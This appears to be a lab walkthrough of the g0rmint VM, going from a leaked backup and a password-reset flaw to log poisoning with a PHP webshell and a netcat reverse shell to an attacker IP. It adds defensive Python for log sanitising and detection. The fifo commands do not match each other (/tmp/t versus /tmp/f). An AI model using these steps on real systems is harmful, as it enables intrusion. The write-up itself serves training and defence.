1. Host discovery
2. Port scanning
3. Open port 80 in a browser
As expected, a 404 page; take a look at robots.txt
4. Directory scan
Scan with dirbuster
Nothing useful turns up. Rather than waiting for the full directory listing, start by examining the login page carefully
View the page source
Try accessing it directly; no result
Next, scan the directory for files
Only one result is found; open it
There is a compressed backup file; try downloading it
After extracting it, the contents are as follows:
5. Code audit
db.sql stands out the most; open it first
It yields useful information: id, username, e-mail, password (hashing scheme not yet known). Check login.php to see whether it is referenced there
It is MD5; just crack the hash
The password is demo; try logging in
Unfortunately the login fails, so look at the configuration file config.php
As hinted there, take a look at the dummy.php file
Since the login fails, the password may have been reset; look at reset.php
Try the reset with the username and mailbox found earlier
The user does not even exist, so search the whole tree for e-mail addresses to see whether another one turns up
In style.css a username and e-mail are found: noman, [email protected]. Go to the reset page
The reset succeeds. Note the time shown at the bottom right, recall how the hash is built before it is encrypted, and compute it online
Password (the green part): 161c7c128ce879b5371ddf4684f0338188e256c6; log in with it
Login succeeds; the password has been reset
Access the log file directly ( http://192.168.109.170/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php ); it records failed logins
6. Getting a shell (getshell)
When logging in, put a one-line PHP webshell in the mailbox field
The failed login is written to the log; access the log and submit the parameter via POST
Reverse shell
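The log poisoning works because two things line up: the e-mail field is written into the log verbatim, and the log file itself carries a .php extension so the server executes it. As an added example (not code from the walkthrough or the target application; the function and file names are assumptions), the block below shows the two fixes a defender would apply: neutralise user-controlled values before they reach the log, and refuse to write logs to a file the web server would execute. It also includes a simple check that flags a PHP open tag in a submitted field, which is useful as a detection hook.

```python
import html
import os
import re

# Matches "<?php", "<?=" and the bare short tag "<?".
PHP_OPEN_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)

EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}


def looks_like_php(value: str) -> bool:
    """True when a user-supplied string carries a PHP open tag (detection hook)."""
    return PHP_OPEN_TAG.search(value) is not None


def safe_log_field(value: str, max_len: int = 254) -> str:
    """Neutralise a user-controlled value before it is logged:
    drop CR/LF so a value cannot forge extra log lines, truncate, and
    HTML-escape so '<?php' is stored as '&lt;?php' and can never be parsed as code."""
    value = value.replace("\r", "").replace("\n", "")[:max_len]
    return html.escape(value, quote=True)


def format_failed_login(email: str, ip: str) -> str:
    """Build the log line; only the escaped form of the e-mail is used."""
    return f"failed login email={safe_log_field(email)} ip={ip}"


def log_failed_login(log_path: str, email: str, ip: str) -> str:
    """Append the line to log_path, refusing any path the web server would execute."""
    if os.path.splitext(log_path)[1].lower() in EXECUTABLE_EXTENSIONS:
        raise ValueError(f"refusing to write a log with an executable extension: {log_path}")
    line = format_failed_login(email, ip)
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line


if __name__ == "__main__":
    # Constructed input: a reset-style field that carries a PHP tag.
    sample = "<?php echo 'hi'; ?>"
    print("flagged:", looks_like_php(sample))
    print(format_failed_login(sample, "10.0.0.5"))
```

Storing logs outside the document root (not merely with a safe extension) closes the remaining path: even an escaped log should not be fetchable over HTTP, and the hidden-directory name the walkthrough found shows that obscurity alone does not keep it private.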
cmd=`mkfifo /tmp/t`;
cmd=`cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.159 7777 >/tmp/f`;
After URL encoding:
cmd=%60mkfifo%20%2ftmp%2ft%60%3B
cmd=%60cat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%20192.168.109.159%207777%20%3E%2ftmp%2ff%60%3B
Start a listener: nc -lvnp 7777
The connection comes back and a shell is obtained. Run whoami to check privileges and cat /etc/issue to get the OS version (the version is also visible on the VM console)
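From the defender's side, every request in this step lands in the web server's access log: the webshell tag and the command string both travel in URL-encoded parameters. The block below is an added example, not code from the walkthrough, that parses a few constructed combined-format access-log lines, URL-decodes the query string, and flags the indicators this page exhibits (PHP open tags, backtick execution, mkfifo, and a shell piped to nc). The log lines and IPs are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Constructed sample lines (combined log format); not from the target machine.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jan/2020:10:01:02 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Jan/2020:10:01:40 +0000] "GET /s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php?cmd=%60mkfifo%20%2ftmp%2ff%60%3B HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [04/Jan/2020:10:02:11 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Jan/2020:10:02:30 +0000] "GET /login.php?email=%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1" 200 100 "-" "curl/7.68.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators drawn from the technique described on this page.
INDICATORS = {
    "php_tag": re.compile(r"<\?(php|=)", re.IGNORECASE),
    "backtick_exec": re.compile(r"`[^`]+`"),
    "fifo_shell": re.compile(r"\bmkfifo\b"),
    "shell_pipe_to_nc": re.compile(r"/bin/sh.*\|\s*nc\b", re.IGNORECASE),
}


def decode_query(target: str) -> str:
    """Return the decoded query string; decode twice to catch double encoding."""
    query = urlparse(target).query
    return unquote_plus(unquote_plus(query))


def scan_line(line: str):
    m = LINE_RE.match(line)
    if m is None:
        return None
    decoded = decode_query(m.group("target"))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": urlparse(m.group("target")).path,
        "indicators": hits,
        "decoded_query": decoded,
    }


def scan_log(text: str):
    """Return one finding per line that carries at least one indicator."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["path"], finding["indicators"])
```

Only GET parameters appear in a standard access log; the POST body used in the walkthrough's final step needs a request-body audit source such as a WAF or reverse-proxy log to be seen, which is the caveat to keep in mind when building this into a detection rule.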
7. Privilege escalation
Search for vulnerabilities affecting this version: searchsploit ubuntu 16
The remaining steps are the same as the privilege-escalation steps for the target machine in the link below